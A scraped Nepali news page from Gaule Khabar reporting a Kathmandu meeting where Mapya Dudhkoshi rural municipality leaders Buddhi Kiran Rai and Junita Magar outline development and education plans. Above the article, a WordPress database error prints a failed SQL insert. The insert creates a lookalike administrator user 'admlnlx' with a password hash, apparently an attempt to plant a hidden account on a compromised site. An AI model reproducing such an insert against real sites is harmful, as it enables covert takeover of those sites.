WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B9m.HQ1pT29gg9fnRL/.52Laxmkccv/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-01 23:11:34', '', 'admlnlx', 'admlnlx')

आफ्नो स्वार्थको लागि काम गरेका छैनौ अध्यक्ष: बुद्धिकिरण राई – Gaule Khabar

आफ्नो स्वार्थको लागि काम गरेका छैनौ अध्यक्ष: बुद्धिकिरण राई

आफ्नो स्वार्थको लागि काम गरेका छैनौ अध्यक्ष: बुद्धिकिरण राई

गाउँले न्यूज, २६ माघ, काठमाण्डौ । माप्य दुधकोशी गाउँपालिकाको विकास तथा भावि योजनाको विषयमा बृहत छलफल कार्यक्रम सम्पन्न भएको छ ।

कार्यक्रममा बोल्नुहुँदै अध्यक्ष बुद्धी किरण राई तस्बिर:बल बहादुर राई

काठमाण्डौ चपलकारखाना स्थित ए वान क्याफेमा सम्पन्न कार्यक्रममा माप्य दुधकोशी गाउँपालिका अध्यक्ष बुद्धि किरण राईले अहिले सम्म गाउँपालिकाले गरेका कामहरुको संक्षिप्त रुपमा प्रकाश पार्दै गाउँपालिकामा शिक्षाको गुणस्तर र एकरुपताको लागि स्थानीय पाठ्यक्रम तयार गरिरहेको जानकारी गराउनु भयो । कार्यक्रमा सहभागि जनताको गुनासोलाई सम्बोधन गर्दै अध्यक्ष राईले माप्य दुधकोशी गाउँपालिका ६ स्थित तामाखानिको लागि आवश्यक छलफल भईरहेको र सरकारी तवरबाट हुने काम गरिरहेको साथै माप्य दुधकोशी गाउँपालिकाको ५ नंं वडा कार्यलय स्थापनाको लागि कुरा भइसकेको केहि बाँकि काम चाडै सम्पन्न गर्ने बताए । अध्यक्ष राईले आफूहरु कुनै पनि स्वार्थको लागि काम नगरेको जनता र देशको निम्ति काम गरिरहेको बताए साथै विभिन्न सामाजिक सञ्जालमा आएका कुराहरुको पछाडि नलाग्न पनि आग्रह गरे र गाउँपालिका निमार्णको लागि माप्य दुधकोशी गाउँपालिकाका सम्पूर्ण जनतासँग सकरात्मक सहयोगको लागि आग्रह पनि गर्नुभयो ।

कार्यक्रममा बोल्नुहुँदै उपाध्य्क्ष जुनिता मगर तस्बिर बल बहादुर राई

सोहि कार्यक्रममा बोल्दै माप्य दुधकोशी गाउँपालिका उपाध्यक्ष जुनिता मगरले कानून भन्दा माथि कोहि नभएको अहिले सम्म सबैको सल्लाह र नितिगत रुपमा विकासको काम गरिरहेको गाउँपालिकाका सबै वडालाई सडक सञ्जालसँग जोड्ने काम भएको बताए । साथै व्यावसायीक र गुणस्तरीय शिक्षाको लागि गाउँपालिका भित्रका शिक्षक र बुद्धिजिवीसँग छफल चलिरकेको प्रदेशक नंं १ कै नमूना विद्यालय बनाउने लक्ष्य रहेको बताए । वहाँले हामी पनि विषय विज्ञ छैनौ, सिक्दै काम पनि गर्दै छौ, काठमाडौंमा बस्ने बुद्धिजीवीहरुकाे सल्लाह गाउँपालिका स्तरीय वा राष्ट्रिय गौरबका हुन सक्छ हामीसँग शेयर गर्नुस गाउँपालिका सहकार्य गर्न तयार रहेको बताए ।

कार्यक्रममा सहाभगिहरु तस्बिर: बल बहादुर राई

कार्यक्रममा माप्य दुधकोशी गाउँपालिका ३ का वडा सदस्या बुद्धिराज राई, किरात खालिङ राई उत्थान संघ केन्द्रिय अध्यक्ष अर्जुन खालिङ, माप्य दुधकोशी गाउँपालिका २ का राज कुमार राई, माप्य दुधकोशी गाउँपालिका १ का भूवान सिंह राई, माप्य दुधकोशी गाउँपालिका ६ का चन्द्र घिमिरे, माप्य दुधकोशी गाउँपालिका २ का निर्मल मगरले बिकास र भावि योजनाको बिषयमा आफ्नो भनाई राख्नु भयो । अधिकास बक्ताहरुले जनता र देशको लागि सधै कटिबद्ध भएर लाग्न आग्रह गरे र आफ्नो गाउँ निमार्णमको लागि सबैले हातेमालो गर्ने र कमि कम्जोरी भएकमा खबरदारी गर्ने पनि बताए । उक्त कार्यक्रम तिलक राईको संयोजनमा सम्पन्न भएको हो ।

कार्यक्रममा सहाभगिहरु तस्बिर: बल बहादुर राई
कार्यक्रममा सहाभगिहरु तस्बिर: बल बहादुर राई
कार्यक्रममा सहाभगिहरु तस्बिर: बल बहादुर राई

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका